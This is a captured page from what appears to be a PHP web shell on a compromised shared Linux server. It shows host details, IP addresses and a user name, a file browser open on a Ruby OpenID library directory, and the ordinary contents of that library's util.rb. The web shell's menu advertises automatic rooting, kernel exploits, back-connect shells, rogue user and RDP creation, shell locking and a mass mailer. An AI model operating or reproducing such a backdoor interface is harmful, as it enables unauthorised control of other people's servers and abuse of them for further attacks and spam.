Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
openid /
[ HOME SHELL ]
Name
Size
Permission
Action
consumer
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
store
[ DIR ]
drwxr-xr-x
yadis
[ DIR ]
drwxr-xr-x
association.rb
7.36
KB
-rw-r--r--
consumer.rb
15.62
KB
-rw-r--r--
cryptutil.rb
2.99
KB
-rw-r--r--
dh.rb
2.66
KB
-rw-r--r--
extension.rb
1.12
KB
-rw-r--r--
fetchers.rb
7.46
KB
-rw-r--r--
kvform.rb
3.26
KB
-rw-r--r--
kvpost.rb
1.62
KB
-rw-r--r--
message.rb
16.13
KB
-rw-r--r--
protocolerror.rb
120
B
-rw-r--r--
server.rb
49.72
KB
-rw-r--r--
trustroot.rb
10.65
KB
-rw-r--r--
urinorm.rb
1.77
KB
-rw-r--r--
util.rb
2.74
KB
-rw-r--r--
version.rb
38
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.rb
require "cgi" require "uri" require "logger" # See OpenID::Consumer or OpenID::Server modules, as well as the store classes module OpenID class AssertionError < Exception end # Exceptions that are raised by the library are subclasses of this # exception type, so if you want to catch all exceptions raised by # the library, you can catch OpenIDError class OpenIDError < StandardError end module Util BASE64_CHARS = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ' \ 'abcdefghijklmnopqrstuvwxyz0123456789+/') BASE64_RE = Regexp.compile(" \\A ([#{BASE64_CHARS}]{4})* ([#{BASE64_CHARS}]{2}==| [#{BASE64_CHARS}]{3}=)? \\Z", Regexp::EXTENDED) def Util.assert(value, message=nil) if not value raise AssertionError, message or value end end def Util.to_base64(s) [s].pack('m').gsub("\n", "") end def Util.from_base64(s) without_newlines = s.gsub(/[\r\n]+/, '') if !BASE64_RE.match(without_newlines) raise ArgumentError, "Malformed input: #{s.inspect}" end without_newlines.unpack('m').first end def Util.urlencode(args) a = [] args.each do |key, val| if val.nil? val = '' elsif !!val == val #it's boolean let's convert it to string representation # or else CGI::escape won't like it val = val.to_s end a << (CGI::escape(key) + "=" + CGI::escape(val)) end a.join("&") end def Util.parse_query(qs) query = {} CGI::parse(qs).each {|k,v| query[k] = v[0]} return query end def Util.append_args(url, args) url = url.dup return url if args.length == 0 if args.respond_to?('each_pair') args = args.sort end url << (url.include?("?") ? "&" : "?") url << Util.urlencode(args) end @@logger = Logger.new(STDERR) @@logger.progname = "OpenID" def Util.logger=(logger) @@logger = logger end def Util.logger @@logger end # change the message below to do whatever you like for logging def Util.log(message) logger.info(message) end def Util.auto_submit_html(form, title='OpenID transaction in progress') return " <html> <head> <title>#{title}</title> </head> <body onload='document.forms[0].submit();'> #{form} <script> var elements = document.forms[0].elements; for (var i = 0; i < elements.length; i++) { elements[i].style.display = \"none\"; } </script> </body> </html> " end ESCAPE_TABLE = { '&' => '&', '<' => '<', '>' => '>', '"' => '"', "'" => ''' } # Modified from ERb's html_encode def Util.html_encode(str) str.to_s.gsub(/[&<>"']/) {|s| ESCAPE_TABLE[s] } end end end
Close